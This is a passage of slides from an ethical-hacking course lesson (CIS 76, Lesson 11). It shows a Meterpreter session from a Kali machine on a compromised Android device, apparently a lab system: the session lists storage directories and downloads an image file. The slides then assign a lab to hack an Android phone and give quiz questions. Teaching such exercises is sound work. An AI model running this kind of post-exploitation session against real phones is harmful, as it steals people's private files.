100444/r--r--r-- 4314 fil 2016-11-06 15:05:06 -0800 ueventd.rc
40444/r--r--r-- 4096 dir 2015-10-06 09:47:38 -0700 vendor
100000/--------- 113 fil 2016-11-06 15:05:08 -0800 x86.prop

meterpreter > 136

 CIS 76 - Lesson 11

EH-Kali-xx
cd /sdcard
ls

meterpreter > cd /sdcard

meterpreter > ls
Listing: /storage/emulated/legacy
=================================

Mode Size Type Last modified Name

---- ---- ---- ------------- ----
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Alarms
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:06 -0700 Android
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 DCIM
40666/rw-rw-rw- 4096 dir 2016-11-06 15:28:29 -0800 Download
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Movies
40666/rw-rw-rw- 4096 dir 2016-11-05 14:39:59 -0700 Music
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Notifications
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Pictures
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Podcasts
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Ringtones
40666/rw-rw-rw- 4096 dir 2016-11-06 14:44:45 -0800 storage

meterpreter >
137
 CIS 76 - Lesson 11

EH-Kali-xx
cd Download
ls

138
 CIS 76 - Lesson 11

EH-Kali-xx

pwd
ls
download images.jpg

139
CIS 76 - Lesson 11

EH-Kali-xx

140
 CIS 76 - Lesson 11

Assignment

141
CIS 76 - Lesson 11

Lab 9

Hack an Android phone

142
 CIS 76 - Lesson 11

Wrap up

143
 CIS 76 - Lesson 11

Next Class
Assignment: Check the Calendar Page on the web site to
see what is due next week.

Quiz questions for next class:

• With respect to embedded systems, what is an RTOS?

• Why is UPnP a security issue for IoT devices?

• What is APT 28?

144
 CIS 76 - Lesson 11

Backup
145